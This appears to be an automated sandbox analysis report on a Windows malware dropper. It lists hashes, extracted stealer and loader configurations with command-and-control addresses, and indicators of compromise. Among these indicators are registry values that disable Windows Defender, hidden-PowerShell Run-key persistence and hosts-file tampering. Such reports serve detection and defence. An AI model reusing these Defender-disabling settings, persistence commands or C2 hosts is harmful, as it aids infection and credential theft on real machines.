Analysis
-
max time kernel
124s -
max time network
154s -
platform
windows10-2004_x64 -
resource
win10v2004-20231020-en -
resource tags
arch:x64arch:x86image:win10v2004-20231020-enlocale:en-usos:windows10-2004-x64system -
submitted
26/10/2023, 08:33
Static task
static1
Behavioral task
behavioral1
Sample
44117aa4ffc3de9f9176bbbcfa9445aeb7e735e83b7928d8a6cc57e1eb67f0e1.exe
Resource
win10v2004-20231020-en
General
-
Target
44117aa4ffc3de9f9176bbbcfa9445aeb7e735e83b7928d8a6cc57e1eb67f0e1.exe
-
Size
1.6MB
-
MD5
e167824272e179f39aa669d5488b5872
-
SHA1
a2a3b92d6db2b4bc2313be817d7233eda645feea
-
SHA256
44117aa4ffc3de9f9176bbbcfa9445aeb7e735e83b7928d8a6cc57e1eb67f0e1
-
SHA512
dba382038a511fabafbe129d06fa01b994de9a6a58912078221be5a5e16c1ffc520a6310032e267ccd92604d52bf9e8be103ba12744e8d64485d3acb9069e90d
-
SSDEEP
49152:uUcoOxgTTtcDja0CrFZLAiw6TECx5VfZ/+S1G+:Lc7xgTTaDjGZkiLTlx5Vf9X
Malware Config
Extracted
smokeloader
2022
http://77.91.68.29/fks/
Extracted
redline
grome
77.91.124.86:19084
Extracted
amadey
3.89
http://77.91.124.1/theme/index.php
-
install_dir
fefffe8cea
-
install_file
explothe.exe
-
strings_key
36a96139c1118a354edf72b1080d4b2f
Extracted
redline
kinza
77.91.124.86:19084
Extracted
smokeloader
up3
Extracted
smokeloader
2020
http://host-file-host6.com/
http://host-host-file8.com/
Extracted
raccoon
6a6a005b9aa778f606280c5fa24ae595
http://195.123.218.98:80
http://31.192.23
-
user_agent
SunShineMoonLight
Extracted
redline
@ytlogsbot
194.169.175.235:42691
Signatures
-
DcRat 4 IoCs
DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.
description ioc pid Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" 44117aa4ffc3de9f9176bbbcfa9445aeb7e735e83b7928d8a6cc57e1eb67f0e1.exe 4760 schtasks.exe 1808 schtasks.exe 1724 schtasks.exe -
Detect ZGRat V1 1 IoCs
resource yara_rule behavioral1/memory/5748-633-0x0000000000550000-0x0000000000930000-memory.dmp family_zgrat_v1 -
Glupteba payload 5 IoCs
resource yara_rule behavioral1/memory/5772-664-0x0000000002DE0000-0x00000000036CB000-memory.dmp family_glupteba behavioral1/memory/5772-670-0x0000000000400000-0x0000000000D1B000-memory.dmp family_glupteba behavioral1/memory/5772-728-0x0000000000400000-0x0000000000D1B000-memory.dmp family_glupteba behavioral1/memory/5772-953-0x0000000000400000-0x0000000000D1B000-memory.dmp family_glupteba behavioral1/memory/5772-983-0x0000000000400000-0x0000000000D1B000-memory.dmp family_glupteba -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" AppLaunch.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" 4891.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" 4891.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" 4891.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" 4891.exe Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection AppLaunch.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" AppLaunch.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" AppLaunch.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" AppLaunch.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" AppLaunch.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" 4891.exe -
Raccoon Stealer payload 3 IoCs
resource yara_rule behavioral1/memory/3632-807-0x0000000000400000-0x000000000041B000-memory.dmp family_raccoon behavioral1/memory/3632-818-0x0000000000400000-0x000000000041B000-memory.dmp family_raccoon behavioral1/memory/3632-821-0x0000000000400000-0x000000000041B000-memory.dmp family_raccoon -
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine payload 7 IoCs
resource yara_rule behavioral1/memory/3364-66-0x0000000000400000-0x000000000043E000-memory.dmp family_redline behavioral1/memory/4020-387-0x0000000000560000-0x00000000005BA000-memory.dmp family_redline behavioral1/memory/3560-525-0x0000000000AB0000-0x0000000000AEE000-memory.dmp family_redline behavioral1/memory/4020-544-0x0000000000400000-0x000000000047E000-memory.dmp family_redline behavioral1/memory/3660-604-0x0000000000480000-0x00000000004DA000-memory.dmp family_redline behavioral1/memory/3660-638-0x0000000000400000-0x000000000047E000-memory.dmp family_redline behavioral1/memory/5620-1163-0x0000000000540000-0x000000000057E000-memory.dmp family_redline -
SmokeLoader
Modular backdoor trojan in use since 2014.
-
Suspicious use of NtCreateUserProcessOtherParentProcess 9 IoCs
description pid Process procid_target PID 2308 created 3300 2308 latestX.exe 37 PID 2308 created 3300 2308 latestX.exe 37 PID 2308 created 3300 2308 latestX.exe 37 PID 2308 created 3300 2308 latestX.exe 37 PID 2308 created 3300 2308 latestX.exe 37 PID 1040 created 3300 1040 updater.exe 37 PID 1040 created 3300 1040 updater.exe 37 PID 1040 created 3300 1040 updater.exe 37 PID 1040 created 3300 1040 updater.exe 37 -
Downloads MZ/PE file
-
Drops file in Drivers directory 2 IoCs
description ioc Process File created C:\Windows\System32\drivers\etc\hosts latestX.exe File created C:\Windows\System32\drivers\etc\hosts updater.exe -
Modifies Windows Firewall 1 TTPs 1 IoCs
pid Process 572 netsh.exe -
Stops running service(s) 3 TTPs
-
Checks computer location settings 2 TTPs 4 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-3811856890-180006922-3689258494-1000\Control Panel\International\Geo\Nation 5JG7nd9.exe Key value queried \REGISTRY\USER\S-1-5-21-3811856890-180006922-3689258494-1000\Control Panel\International\Geo\Nation explothe.exe Key value queried \REGISTRY\USER\S-1-5-21-3811856890-180006922-3689258494-1000\Control Panel\International\Geo\Nation 906E.exe Key value queried \REGISTRY\USER\S-1-5-21-3811856890-180006922-3689258494-1000\Control Panel\International\Geo\Nation 7DAE.exe -
Executes dropped EXE 47 IoCs
pid Process 2724 ji2Rk63.exe 1660 An5dW77.exe 1996 Ec1Qz04.exe 3236 hi3HF41.exe 2472 fU6tW83.exe 4388 1ap54Lf4.exe 3296 2cN4918.exe 3484 3nN42tm.exe 2784 4NF601SA.exe 4408 5JG7nd9.exe 2468 explothe.exe 4708 6Md9pf5.exe 2264 7Rt5OT77.exe 5144 msedge.exe 5528 43DA.exe 3972 44A6.exe 6032 tN1mE9TX.exe 4532 vC6cO6Ik.exe 3020 Wj5od8jc.exe 6072 dk2qX3md.exe 5148 1Qi55hp5.exe 5784 470A.exe 5628 4891.exe 2112 4A77.exe 4020 4C4C.exe 3560 2AB154Bn.exe 5924 7DAE.exe 5988 7FD2.exe 3660 81E6.exe 5780 toolspub2.exe 5772 31839b57a4f11171d6abc8bbc4451ee4.exe 3484 Conhost.exe 2308 latestX.exe 5748 906E.exe 5544 toolspub2.exe 3736 LzmwAqmV.exe 1032 LzmwAqmV.tmp 6128 zDriveTools.exe 964 zDriveTools.exe 3852 D383.exe 2136 explothe.exe 3552 31839b57a4f11171d6abc8bbc4451ee4.exe 1040 updater.exe 4684 csrss.exe 5620 injector.exe 5008 windefender.exe 5876 windefender.exe -
Loads dropped DLL 7 IoCs
pid Process 3660 81E6.exe 3660 81E6.exe 1032 LzmwAqmV.tmp 1032 LzmwAqmV.tmp 1032 LzmwAqmV.tmp 5748 906E.exe 264 rundll32.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" 4891.exe -
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 14 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-3811856890-180006922-3689258494-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\socks5 = "powershell.exe -windowstyle hidden -Command \"& 'C:\\Users\\Admin\\AppData\\Local\\Temp\\7FD2.exe'\"" 7FD2.exe Set value (str) \REGISTRY\USER\S-1-5-21-3811856890-180006922-3689258494-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\"" csrss.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" 43DA.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup3 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP003.TMP\\\"" Wj5od8jc.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup2 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP002.TMP\\\"" An5dW77.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup2 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP002.TMP\\\"" vC6cO6Ik.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup4 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP004.TMP\\\"" hi3HF41.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup1 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP001.TMP\\\"" tN1mE9TX.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup4 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP004.TMP\\\"" dk2qX3md.exe Set value (str) \REGISTRY\USER\S-1-5-21-3811856890-180006922-3689258494-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\"" 31839b57a4f11171d6abc8bbc4451ee4.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup1 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP001.TMP\\\"" ji2Rk63.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup3 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP003.TMP\\\"" Ec1Qz04.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" 44117aa4ffc3de9f9176bbbcfa9445aeb7e735e83b7928d8a6cc57e1eb67f0e1.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup5 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP005.TMP\\\"" fU6tW83.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Manipulates WinMonFS driver. 1 IoCs
Roottkits write to WinMonFS to hide directories/files from being detected.
description ioc Process File opened for modification \??\WinMonFS csrss.exe -
Drops file in System32 directory 9 IoCs
description ioc Process File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive powershell.exe File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive powershell.exe File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log powershell.exe -
Suspicious use of SetThreadContext 7 IoCs
description pid Process procid_target PID 4388 set thread context of 1684 4388 1ap54Lf4.exe 96 PID 3296 set thread context of 884 3296 2cN4918.exe 102 PID 2784 set thread context of 3364 2784 4NF601SA.exe 107 PID 5148 set thread context of 4760 5148 1Qi55hp5.exe 181 PID 5780 set thread context of 5544 5780 toolspub2.exe 197 PID 5748 set thread context of 3632 5748 906E.exe 209 PID 3852 set thread context of 5620 3852 D383.exe 261 -
Checks for VirtualBox DLLs, possible anti-VM trick 1 TTPs 1 IoCs
Certain files are specific to VirtualBox VMs and can be used to detect execution in a VM.
description ioc Process File opened (read-only) \??\VBoxMiniRdrDN 31839b57a4f11171d6abc8bbc4451ee4.exe -
Drops file in Program Files directory 25 IoCs
description ioc Process File created C:\Program Files (x86)\Drive Tools\is-PJAQ4.tmp LzmwAqmV.tmp File created C:\Program Files (x86)\Drive Tools\is-3A837.tmp LzmwAqmV.tmp File created C:\Program Files (x86)\Drive Tools\is-8M6C3.tmp LzmwAqmV.tmp File created C:\Program Files (x86)\Drive Tools\is-PQKAB.tmp LzmwAqmV.tmp File created C:\Program Files (x86)\Drive Tools\is-43JFR.tmp LzmwAqmV.tmp File created C:\Program Files (x86)\Drive Tools\is-6ASJF.tmp LzmwAqmV.tmp File created C:\Program Files (x86)\Drive Tools\is-H8F07.tmp LzmwAqmV.tmp File opened for modification C:\Program Files (x86)\Drive Tools\zDriveTools.exe LzmwAqmV.tmp File created C:\Program Files (x86)\Drive Tools\is-08DI6.tmp LzmwAqmV.tmp File created C:\Program Files (x86)\Drive Tools\is-DK6LH.tmp LzmwAqmV.tmp File created C:\Program Files (x86)\Drive Tools\Lang\is-Q5GM4.tmp LzmwAqmV.tmp File created C:\Program Files (x86)\Drive Tools\is-V5TAL.tmp LzmwAqmV.tmp File opened for modification C:\Program Files (x86)\Drive Tools\unins000.dat LzmwAqmV.tmp File created C:\Program Files (x86)\Drive Tools\is-P4OQT.tmp LzmwAqmV.tmp File created C:\Program Files (x86)\Drive Tools\is-2JD76.tmp LzmwAqmV.tmp File created C:\Program Files (x86)\Drive Tools\is-QVMDJ.tmp LzmwAqmV.tmp File created C:\Program Files (x86)\Drive Tools\unins000.dat LzmwAqmV.tmp File created C:\Program Files (x86)\Drive Tools\is-8KARP.tmp LzmwAqmV.tmp File created C:\Program Files (x86)\Drive Tools\is-6C95R.tmp LzmwAqmV.tmp File created C:\Program Files (x86)\Drive Tools\is-4KKUJ.tmp LzmwAqmV.tmp File created C:\Program Files (x86)\Drive Tools\is-60SOR.tmp LzmwAqmV.tmp File created C:\Program Files (x86)\Drive Tools\is-SV2UP.tmp LzmwAqmV.tmp File created C:\Program Files (x86)\Drive Tools\is-M1GV6.tmp LzmwAqmV.tmp File created C:\Program Files (x86)\Drive Tools\is-DIV49.tmp LzmwAqmV.tmp File created C:\Program Files\Google\Chrome\updater.exe latestX.exe -
Drops file in Windows directory 5 IoCs
description ioc Process File created C:\Windows\windefender.exe csrss.exe File opened for modification C:\Windows\windefender.exe csrss.exe File opened for modification C:\Windows\Wanugegulaho milorahaxah mosuraxupib rusekutokefod bopujune 4C4C.exe File opened for modification C:\Windows\rss 31839b57a4f11171d6abc8bbc4451ee4.exe File created C:\Windows\rss\csrss.exe 31839b57a4f11171d6abc8bbc4451ee4.exe -
Launches sc.exe 11 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 1660 sc.exe 5380 sc.exe 3972 sc.exe 4372 sc.exe 868 sc.exe 5976 sc.exe 5824 sc.exe 456 sc.exe 5560 sc.exe 5912 sc.exe 5524 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 4 IoCs
pid pid_target Process procid_target 4168 884 WerFault.exe 102 4944 4760 WerFault.exe 181 2472 3660 WerFault.exe 189 224 3632 WerFault.exe 209 -
Checks SCSI registry key(s) 3 TTPs 6 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI toolspub2.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI toolspub2.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI 3nN42tm.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI 3nN42tm.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI 3nN42tm.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI toolspub2.exe -
Creates scheduled task(s) 1 TTPs 3 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 4760 schtasks.exe 1808 schtasks.exe 1724 schtasks.exe -
Enumerates system info in registry 2 TTPs 3 IoCs
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe -
Modifies data under HKEY_USERS 64 IoCs
description ioc Process Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-251 = "Dateline Daylight Time" 31839b57a4f11171d6abc8bbc4451ee4.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-771 = "Montevideo Daylight Time" 31839b57a4f11171d6abc8bbc4451ee4.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-384 = "Namibia Daylight Time" 31839b57a4f11171d6abc8bbc4451ee4.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-631 = "Tokyo Daylight Time" 31839b57a4f11171d6abc8bbc4451ee4.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-751 = "Tonga Daylight Time" 31839b57a4f11171d6abc8bbc4451ee4.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-142 = "Canada Central Standard Time" 31839b57a4f11171d6abc8bbc4451ee4.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-722 = "Central Pacific Standard Time" 31839b57a4f11171d6abc8bbc4451ee4.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-341 = "Egypt Daylight Time" 31839b57a4f11171d6abc8bbc4451ee4.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-962 = "Paraguay Standard Time" 31839b57a4f11171d6abc8bbc4451ee4.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-652 = "AUS Central Standard Time" 31839b57a4f11171d6abc8bbc4451ee4.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-511 = "Central Asia Daylight Time" 31839b57a4f11171d6abc8bbc4451ee4.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-372 = "Jerusalem Standard Time" 31839b57a4f11171d6abc8bbc4451ee4.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-385 = "Namibia Standard Time" 31839b57a4f11171d6abc8bbc4451ee4.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-961 = "Paraguay Daylight Time" 31839b57a4f11171d6abc8bbc4451ee4.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-1912 = "Russia TZ 10 Standard Time" 31839b57a4f11171d6abc8bbc4451ee4.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2062 = "North Korea Standard Time" 31839b57a4f11171d6abc8bbc4451ee4.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-1042 = "Ulaanbaatar Standard Time" 31839b57a4f11171d6abc8bbc4451ee4.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-371 = "Jerusalem Daylight Time" 31839b57a4f11171d6abc8bbc4451ee4.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-541 = "Myanmar Daylight Time" 31839b57a4f11171d6abc8bbc4451ee4.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-1931 = "Russia TZ 11 Daylight Time" 31839b57a4f11171d6abc8bbc4451ee4.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2491 = "Aus Central W. Daylight Time" 31839b57a4f11171d6abc8bbc4451ee4.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-331 = "E. Europe Daylight Time" 31839b57a4f11171d6abc8bbc4451ee4.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-832 = "SA Eastern Standard Time" 31839b57a4f11171d6abc8bbc4451ee4.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-182 = "Mountain Standard Time (Mexico)" 31839b57a4f11171d6abc8bbc4451ee4.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local 